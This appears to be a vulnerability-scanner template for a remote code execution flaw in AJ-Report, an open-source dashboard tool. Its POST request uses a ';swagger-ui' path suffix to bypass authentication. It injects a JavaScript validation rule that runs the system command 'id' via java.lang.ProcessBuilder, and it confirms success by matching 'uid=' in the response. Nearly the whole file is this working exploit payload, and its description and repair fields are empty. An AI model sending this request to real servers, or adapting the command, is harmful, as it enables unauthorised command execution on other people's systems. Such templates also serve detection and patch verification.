id:

info:
  name: AJ-Report开源数据大屏 verification swagger-ui RCE漏洞
  severity:
  description:
  details:
  repair:
requests1:
  method: POST
  path: /dataSetParam/verification;swagger-ui/
  headers:
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate, br
    Accept-Language: zh-CN,zh;q=0.9
    Content-Type: application/json;charset=UTF-8
    Connection: close
  data: |
    {"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
response1:
  body: uid=
  code: 200
requests2:
response2: